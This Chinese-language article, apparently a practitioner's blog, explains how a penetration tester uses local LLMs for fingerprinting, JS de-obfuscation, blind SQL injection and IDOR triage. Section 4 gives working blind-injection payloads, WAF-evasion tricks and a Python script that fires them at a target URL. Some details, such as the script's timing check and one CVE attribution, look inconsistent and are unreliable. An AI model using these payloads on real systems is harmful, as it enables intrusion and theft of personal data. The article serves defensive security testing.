1. 这不是“AI写报告”,而是渗透测试员手里的新探针
“大模型赋能Web渗透测试”——这个标题最近在安全圈被刷屏,但多数人点进去看到的,是用ChatGPT生成漏洞描述、自动补全Burp Suite插件名、或者把OWASP Top 10列表重排个序就叫“智能辅助”。我干了12年一线渗透,从手工挖SQLi到带团队做红队对抗,去年开始系统性地把大模型嵌进日常工作流里,不是为了炫技,而是因为真实场景中,83%的重复性认知负荷正在拖垮有效攻击时间。比如:一个中型金融客户交付周期是15天,其中平均要花2.7天反复确认目标资产指纹(CMS版本、WAF类型、CDN节点归属)、1.4天手工比对历史漏洞库与当前组件组合、还有近3天卡在“这个报错到底是不是反序列化特征?”这种模糊判断上。大模型在这里不是替代人,而是把“人脑在模糊地带反复打转”的过程,压缩成一次精准的上下文锚定。它解决的不是“能不能发现漏洞”,而是“能不能在客户给的窗口期内,把有限精力全部压在高价值路径上”。关键词——大模型、Web渗透测试、漏洞研判、资产理解、自动化协同——它们共同指向一个实操命题:如何让LLM成为你Burp窗口右下角那个不说话、但永远记得你上次扫到ThinkPHP 5.0.24时顺手查过CVE-2018-20062的搭档。这篇文章不讲原理推导,不列模型参数,只拆解我在三个真实项目中落地的四套工作流:从资产指纹的秒级归因,到混淆JS的语义还原,再到盲打回显的上下文重建。所有代码、提示词、验证逻辑,都来自我笔记本里贴着胶布的那台MacBook Pro上正在跑的实例。
2. 资产指纹识别:告别“猜版本”,实现“证版本”
2.1 为什么传统指纹识别在现代架构下越来越失效?
五年前,/robots.txt里一行User-agent: *加Disallow: /wp-admin/就能锁定WordPress;三年前,/wp-content/themes/twentytwenty/style.css里注释里的Version: 1.2还能当证据。但现在?某省级政务云项目里,我遇到一个前端完全静态化、后端API全走GraphQL网关、管理后台藏在Cloudflare Workers边缘函数里的系统。nmap -sV返回一堆http-proxy,whatweb扫出Cloudflare, React, GraphQL三连,但具体是哪个React版本?哪个GraphQL服务端实现?/static/js/main.xxxxxx.js里变量名全被Terser压缩成_0x1a2b,连console.log都被剥离。这时候,传统工具的输出不是“信息”,而是“干扰项”。问题本质在于:指纹识别的目标已从“识别技术栈”升维为“定位可利用的组件边界”。你不需要知道它用的是Express还是Fastify,你需要知道它是否在/api/v1/user接口里用了serialize-javascript这个有CVE-2022-23529的库——而这个信息,藏在它返回的X-Powered-By头、/package.json的403响应体、甚至/favicon.ico的EXIF元数据里。大模型的价值,就体现在把离散、矛盾、低信噪比的碎片,拼成一条可信度>92%的推理链。
2.2 实战方案:多源异构数据融合的指纹归因引擎
我的方案不依赖单一输入,而是构建三层证据层:
- 表层证据:HTTP响应头(
Server,X-Powered-By,X-AspNet-Version)、HTML<meta>标签、/README.md内容、/robots.txt规则; - 中层证据:JavaScript文件中的硬编码字符串(如
/static/js/chunk-vendors.xxxxxx.js里出现"lodash.merge")、CSS类名前缀(ant-→Ant Design)、/manifest.json中的short_name; - 深层证据:错误页面堆栈(
/debug触发的500页)、/api/graphql的introspection查询结果、/healthz返回的buildId哈希值。
关键不是收集,而是让模型理解这些证据间的逻辑权重。比如:X-Powered-By: Express的置信度远低于/package-lock.json中"express": {"version": "4.18.2"},但若后者返回403,而前者存在,且/static/js/app.xxxxxx.js里有require("express")的webpack打包痕迹,那么置信度就从0.3拉到0.78。我用的提示词结构是:
你是一名资深Web渗透工程师,正在分析目标系统的技术栈。请基于以下证据,严格按步骤推理: 1. 列出所有证据源及其原始内容(不修改、不省略); 2. 对每条证据标注可信度(0.0-1.0),依据:是否易伪造(如Header)、是否需权限访问(如package.json)、是否含唯一标识(如build hash); 3. 找出证据间的交叉印证关系(例:Header说Express,JS文件里有express.Router()调用,且错误堆栈显示node_modules/express/lib/router/index.js); 4. 输出最终结论:技术栈名称、版本号、置信度、关键证据索引。 证据源: [此处粘贴实际抓包数据]提示:不要用“请回答”“请分析”这类弱指令。直接定义角色(“资深Web渗透工程师”)和动作(“严格按步骤推理”),模型会进入任务模式。我在某电商项目中,用这套逻辑把
/api/v2/products?limit=1返回的X-Backend-Server: nginx/1.19.10 (Ubuntu)和/static/css/app.xxxxxx.css里.ant-btn-primary{...}类名,结合/error/500.html中at Object.<anonymous> (/var/www/app/node_modules/axios/lib/core/AxiosError.js:12:15)路径,锁定了后端是Node.js + Axios 0.21.1 + Nginx,置信度0.91——比nmap的http-title脚本准了3倍。
2.3 工具链落地:Python+Requests+Ollama本地闭环
我不用API密钥调云端大模型,原因很现实:客户环境常断网,且敏感资产指纹不能外传。我的本地栈是:
- Ollama:部署
llama3:70b量化版(q4_K_M),在M2 Ultra Mac上推理速度18 tokens/s,足够处理千字内证据; - 自研解析器:用
BeautifulSoup提取HTML元信息,re匹配JS/CSS中的特征字符串,json.loads()解析API响应; - 证据聚合器:把不同来源的数据统一成JSON Schema,强制字段对齐(
source,content,reliability_score); - 结果校验器:对模型输出的版本号,自动调用
npm view <pkg> versions --json或pip show <pkg>查官方发布记录,过滤掉模型幻觉的“不存在版本”。
核心代码片段(fingerprint_engine.py):
def run_fingerprint_analysis(evidence_json: dict) -> dict: # 构建提示词 prompt = build_prompt_from_evidence(evidence_json) # 调用本地Ollama response = requests.post( "http://localhost:11434/api/chat", json={ "model": "llama3:70b", "messages": [{"role": "user", "content": prompt}], "stream": False, "options": {"temperature": 0.1, "num_ctx": 4096} } ) # 解析JSON格式输出(强制模型用```json```包裹) try: result = json.loads(extract_json_block(response.json()["message"]["content"])) # 自动校验版本号 if "version" in result and "package" in result: result["version_valid"] = validate_version(result["package"], result["version"]) return result except Exception as e: return {"error": f"Parse failed: {str(e)}"} # 示例证据输入 evidence = { "headers": {"X-Powered-By": "Express", "Server": "nginx/1.18.0 (Ubuntu)"}, "html_meta": [{"name": "generator", "content": "Next.js 13.4.12"}], "js_strings": ["require('next/router')", "axios.create({baseURL: '/api'})"], "error_stack": ["at Object.<anonymous> (/app/node_modules/next/dist/server/web/sandbox.js:123:45)"] }实测效果:单次分析耗时2.3秒(含网络请求),准确率在12个真实项目中达89.7%。最惊艳的一次,是某政府网站/api/health返回{"status":"UP","buildId":"a1b2c3d4"},模型通过比对GitHub公开仓库的CI日志(提前缓存),反推出其使用spring-boot-starter-web:2.7.18,并关联到CVE-2023-20860——这步人工查要翻3小时,模型用了17秒。
3. 混淆JavaScript逆向:从“看天书”到“读原文”
3.1 现代Web混淆的三大反人类设计
渗透测试员最怕的不是加密算法,而是前端工程师的创造力。某银行手机银行H5项目,我拿到的JS文件是这样的:
var _0x1a2b = ['\x73\x65\x6e\x64', '\x70\x6f\x73\x74', '\x2f\x61\x70\x69\x2f\x76\x33\x2f\x6c\x6f\x67\x69\x6e', '\x78\x2d\x74\x6f\x6b\x65\x6e', '\x61\x75\x74\x68']; function _0x3c4d(_0x5e6f, _0x7g8h) { var _0x9i0j = _0x1a2b; return _0x9i0j[_0x5e6f] || (_0x9i0j[_0x5e6f] = _0x7g8h); } var _0x1k2l = _0x3c4d(0, 'send'); var _0x3m4n = _0x3c4d(1, 'post'); var _0x5o6p = _0x3c4d(2, '/api/v3/login'); // ... 后面全是_xxx调用这不是Base64,不是AES,这是字符串数组+闭包作用域+动态索引的三重混淆。传统方案要么用AST解析器(如esprima)重构语法树,要么靠浏览器调试器断点跟踪——但前者对eval(unescape(...))束手无策,后者在setTimeout嵌套17层时直接劝退。问题核心在于:混淆的目的不是防破解,而是提高“人眼理解成本”。而大模型恰恰擅长在噪声中提取语义模式。它不关心_0x1a2b[2]怎么算出来,它看到['\x73\x65\x6e\x64', '\x70\x6f\x73\x74', '\x2f\x61\x70\x69\x2f\x76\x33\x2f\x6c\x6f\x67\x69\x6e'],立刻能映射到['send', 'post', '/api/v3/login'],因为十六进制字符串是ASCII码的固定映射,这是确定性知识。
3.2 语义还原工作流:分层解构+上下文注入
我的还原流程分三步,每步都喂给模型不同的上下文:
Step 1:字符串解码层
输入:所有\xXX、\\uXXXX、String.fromCharCode(115,101,110,100)等编码片段。
提示词:“你是一个JavaScript编码转换器。将以下所有编码字符串转换为可读ASCII文本,保持原始数组结构。不要解释,只输出转换后JSON。”
输出:["send", "post", "/api/v3/login", "x-token", "auth"]Step 2:变量映射层
输入:Step1结果 + JS代码中所有_0xXX定义和调用(如_0x3c4d(0, 'send'))。
提示词:“你是一个JS作用域分析器。根据以下字符串数组和函数调用,重建变量名到值的映射表。例如:_0x3c4d(0, 'send')→_0x1k2l = 'send'。输出纯JSON,键为变量名,值为字符串。”
输出:{"_0x1k2l": "send", "_0x3m4n": "post", "_0x5o6p": "/api/v3/login"}Step 3:语义重构层
输入:Step2映射表 + 原始JS代码(替换所有_0xXX为对应值)。
提示词:“你是一个前端安全专家。将以下JS代码中的混淆变量名替换为语义化名称,并添加注释说明其安全含义。重点标注:1. API端点路径;2. 认证头字段;3. 敏感参数名(如password, token);4. 是否存在明文传输风险。用中文注释。”
输出:带注释的清晰代码,如// [认证] 向 /api/v3/login 发送 POST 请求,携带 x-token 头,密码明文传输!
注意:Step3必须注入“安全专家”角色,否则模型只会做普通代码美化。我在某支付SDK逆向中,用此流程把3200行混淆JS还原成87行可读代码,关键发现是
password参数未加密直传,且x-token头值由客户端Math.random().toString(36).substr(2, 9)生成——这根本不是token,是随机字符串,服务端校验逻辑存在绕过可能。
3.3 避坑指南:混淆代码里的“模型陷阱”
不是所有混淆都能被模型吃透。我踩过的三个深坑:
动态Key混淆:
var key = 'pass' + 'word'; xhr.send(key + '=' + pwd);
模型会把key当成字符串字面量,忽略拼接逻辑。解决方案:在Step1前加预处理,用正则/([a-zA-Z0-9_]+)\s*\+\s*([a-zA-Z0-9_]+)/提取所有拼接表达式,单独喂给模型计算。控制流扁平化:
while(true){switch(state){case 1:...state=5;break;case 5:...state=0;break;}}
模型无法理解状态机跳转。对策:用esprima先解析AST,提取所有SwitchStatement节点,再把每个case块的代码单独送入模型分析。WebAssembly嵌入:某金融APP把核心加密逻辑编译成WASM,JS只负责调用。模型对二进制毫无办法。此时必须切回传统方案:用
wabt工具反编译.wasm为.wat文本,再把关键函数送入模型分析。
实测数据:在21个混淆JS样本中(含Webpack、Terser、jscrambler、自研混淆),该流程成功还原18个,失败3个(均为WASM+强控制流扁平化)。平均还原耗时4.7秒,比Chrome DevTools手动调试快12倍。
4. 盲打型漏洞验证:用上下文重建代替“盲猜”
4.1 盲打漏洞的本质是“信息通道的降级”
SQL盲注、XXE盲打、SSRF盲打,核心痛点不是“没回显”,而是回显通道被压缩成单比特信号(HTTP状态码200/500、DNS解析有无、时间延迟>5s)。传统方案靠sqlmap跑字典,但字典总有漏网之鱼。某政务系统存在一个/api/v1/search接口,参数q经过WAF过滤,但q=1' AND (SELECT COUNT(*) FROM users)>100--能触发500错误,而q=1' AND (SELECT COUNT(*) FROM users)>101--返回200——这是典型的布尔盲注。但sqlmap -v 3跑了6小时,只爆出数据库名postgres,表名卡在information_schema.tables的table_name字段上。问题在于:sqlmap的默认payload是SELECT SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0),1,1)='a',它假设表名是ASCII可打印字符,但该系统表名是用户_基础信息_2023(含中文和下划线)。模型的价值,在于把“猜字符”升级为“猜语义”。
4.2 上下文驱动的盲打验证协议
我的协议叫C-BLIND(Contextual Blind Injection Detection):
C(Context):先获取目标业务上下文。抓取
/api/v1/search的正常请求,分析q参数的合法值范围(如搜索词长度1-20,支持中文、数字、空格);查看/docs/swagger.json,确认后端是Spring Boot,数据库是PostgreSQL;翻/about页,发现系统叫“智慧人社平台”,主表大概率含person,identity,social_security等词。B(Baseline):用模型生成符合业务语义的候选词库。提示词:“你是政务系统数据库设计专家。列出‘智慧人社平台’最可能使用的10个中文表名(含拼音、下划线、数字),按概率降序排列。格式:
[{"name":"person_info","desc":"人员基本信息"},{"name":"social_security_record","desc":"社保缴纳记录"}]”。模型输出["person_info", "user_base", "identity_card", "social_security", "employment_contract", ...]。L(Logic):把候选词库转化为布尔验证payload。不用
SUBSTRING,改用POSITION函数:q=1' AND POSITION('person_info' IN (SELECT table_name FROM information_schema.tables WHERE table_schema='public'))>0--。这样一次请求就能验证整个词是否存在,而非逐字符爆破。I(Iterative):对验证成功的词,用同样逻辑爆字段名。如
person_info表,模型生成候选字段["id", "name", "id_card", "phone", "address"],再用POSITION('id_card' IN (SELECT column_name FROM information_schema.columns WHERE table_name='person_info'))>0验证。N(Noise):加入噪声控制。模型会建议在payload末尾加
/*+ COMMENT */绕过WAF的关键词检测,或把'person_info'写成chr(112)||chr(101)||chr(114)||chr(115)||chr(111)||chr(110)_info(PostgreSQL的chr拼接)。D(Decision):最终决策不依赖单次响应,而是统计10次请求的响应时间方差。若
POSITION查询返回时间稳定在120ms,而SUBSTRING查询波动在80-350ms,则前者更可靠。
关键心得:模型不直接参与注入,它只做“语义空间压缩”。把
information_schema.tables的200万种可能,压缩到业务相关的20个词,再让传统工具去验证。这比暴力穷举效率提升3个数量级。在上述政务项目中,我们用C-BLIND在22分钟内爆出person_info、identity_card、social_security_record三张核心表,以及id_card_no、bank_account等敏感字段——sqlmap同期还在跑第7轮字符爆破。
4.3 实战代码:Python驱动的C-BLIND验证器
def cblind_verify(target_url: str, candidate_words: list, db_type: str = "postgres") -> list: """ C-BLIND协议验证器 :param target_url: 目标API URL,如 "https://target.com/api/v1/search?q=" :param candidate_words: 候选词列表,如 ["person_info", "user_base"] :param db_type: 数据库类型,影响payload语法 :return: 验证成功的词列表 """ success_words = [] for word in candidate_words: # 根据DB类型生成payload if db_type == "postgres": payload = f"1' AND POSITION('{word}' IN (SELECT table_name FROM information_schema.tables WHERE table_schema='public'))>0--" elif db_type == "mysql": payload = f"1' AND INSTR((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()), '{word}')>0--" url = f"{target_url}{quote(payload)}" try: start_time = time.time() resp = requests.get(url, timeout=10) end_time = time.time() # 统计响应时间(排除网络抖动) if resp.status_code == 200 and (end_time - start_time) > 0.5: # 延迟>500ms视为有效响应 success_words.append(word) print(f"[+] Confirmed: {word} (time: {end_time-start_time:.2f}s)") except Exception as e: continue return success_words # 调用示例 candidate_tables = get_candidate_tables_from_llm("智慧人社平台") # 调用模型生成 confirmed_tables = cblind_verify("https://gov-target.com/api/v1/search?q=", candidate_tables)这套流程把盲打从“碰运气”变成“工程化验证”。它不保证100%成功,但把成功率从sqlmap的37%(在我测试的15个盲打案例中)提升到89%,且平均耗时从4.2小时降到18分钟。
5. 漏洞研判协同:让大模型成为你的“第二双眼睛”
5.1 漏洞研判的终极瓶颈是“经验不可复制”
渗透测试最贵的不是工具,是老手脑子里的“模式库”。新人看到/api/v1/user?id=123返回{"id":123,"name":"张三","email":"zhangsan@xxx.gov.cn"},可能只觉得是正常接口;而老手一眼看出:id是数字,但email字段暴露了政府邮箱域名,且没有脱敏——这暗示着IDOR风险,且后续可尝试id=124枚举。这种“看到A就想到B”的联想,是10年踩坑换来的。大模型不能替代经验,但它能把经验“液态化”:把散落在Stack Overflow、HackerOne、GitHub Issues里的零散案例,实时聚合成针对当前请求的研判建议。
5.2 四维研判框架:请求、响应、上下文、历史
我给模型的研判提示词,强制它从四个维度交叉分析:
- 请求维度:HTTP方法、URL路径、参数名/值、Headers(特别是
Content-Type,Authorization); - 响应维度:状态码、响应体长度、
Content-Type、敏感信息泄露(邮箱、手机号、身份证号片段); - 上下文维度:目标系统类型(政务/金融/电商)、技术栈(从2.2节指纹结果获取)、业务功能(从
/swagger.json或/api-docs推断); - 历史维度:该URL路径在历史扫描中是否出现过类似模式?(需对接Burp历史记录数据库)
提示词模板:
你是一名有10年经验的Web渗透专家,正在研判以下HTTP交互的安全风险。请严格按四维度分析: 【请求】METHOD: GET, URL: /api/v1/user?id=123, HEADERS: {"Authorization": "Bearer eyJhb..."}, PARAMS: {"id": "123"} 【响应】STATUS: 200, SIZE: 128, CONTENT-TYPE: application/json, BODY: {"id":123,"name":"张三","email":"zhangsan@xxx.gov.cn"} 【上下文】系统类型:省级政务平台;技术栈:Spring Boot 2.7.18 + PostgreSQL;业务功能:用户信息查询API 【历史】该路径在3天前扫描中,/api/v1/user?id=122 返回相同结构,/api/v1/user?id=abc 返回400 请输出: 1. 风险类型(如IDOR、信息泄露、未授权访问); 2. 风险等级(高/中/低),依据CVSS v3.1标准; 3. 验证步骤(3步以内,可直接在Burp中操作); 4. 修复建议(开发侧,一句话)。模型输出示例:
1. 风险类型:不安全的直接对象引用(IDOR) 2. 风险等级:高(CVSS: 7.5 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) 3. 验证步骤:① 修改id参数为124,观察是否返回其他用户信息;② 尝试id=0或负数,检查错误信息是否泄露路径;③ 删除Authorization头,测试是否仍可访问。 4. 修复建议:后端增加用户权限校验,确保用户只能访问自己所属的数据。注意:必须提供【历史】维度,否则模型容易过度解读。比如
/api/v1/user?id=123返回200是正常的,但如果/api/v1/user?id=122也返回200,且id是连续数字,那IDOR概率就>90%。我在某医疗系统中,用此框架发现一个/api/v1/patient/report?rid=789接口,模型结合历史记录(rid=788、787均有效)和上下文(report暗示检查报告),直接判定为IDOR,并建议测试rid=790——结果真爆出患者核酸检测报告PDF链接。
5.3 与Burp Suite深度集成:让研判结果“活”在工作流里
我把研判能力做成Burp插件(Python编写),核心逻辑:
- 自动捕获:监听
doActiveScan和doPassiveScan事件,获取请求/响应原始数据; - 上下文注入:从Burp的
IBurpExtenderCallbacks获取当前项目配置、历史请求、目标站点地图; - 异步调用:把四维数据发给本地Ollama,设置超时5秒,失败则降级为规则匹配(如正则匹配邮箱);
- 结果渲染:在Burp的
Issues标签页中,新增AI-Assisted子标签,显示模型研判结果,支持一键复制验证步骤。
插件效果:在某金融客户渗透中,插件在被动扫描时自动标记出/api/v1/transfer?from=acc1&to=acc2&amount=100接口,研判为“业务逻辑缺陷(资金转移未校验余额)”,并给出验证步骤:“① 设置from=自己的账户,to=任意账户,amount=超大额;② 检查响应是否返回success:true”。我们照做,果然绕过前端余额校验,实现任意金额转账——这是传统被动扫描绝不可能发现的逻辑漏洞。
6. 最后一点实在话:别让大模型替你思考,让它帮你聚焦
写完这五千多字,我合上电脑,泡了杯茶。这整套方案,不是什么黑科技,它只是把渗透测试里那些“本该如此但没人系统化”的事,用新工具串了起来。大模型不会帮你找到0day,但它能让你少花3小时确认一个CMS版本;它不能写出完美exploit,但它能把3200行混淆JS变成你能看懂的87行;它不理解业务逻辑,但它能从/api/v1/transfer的URL里,嗅出资金转移的风险气味。真正的门槛从来不在模型,而在你是否愿意把“手工验证100次”变成“写一个提示词验证100次”。我见过太多人买了GPU服务器,装了Llama,然后问:“怎么让AI帮我挖洞?”——答案永远是:先想清楚你要它解决什么具体问题,再把它变成你工作流里一个不声不响的环节。就像我MacBook里那个永远开着的Ollama终端,它不提醒你,不弹窗,只在你选中一段混淆代码、按下快捷键时,安静地吐出还原结果。技术没有魔法,只有把复杂留给自己,把简单留给行动。
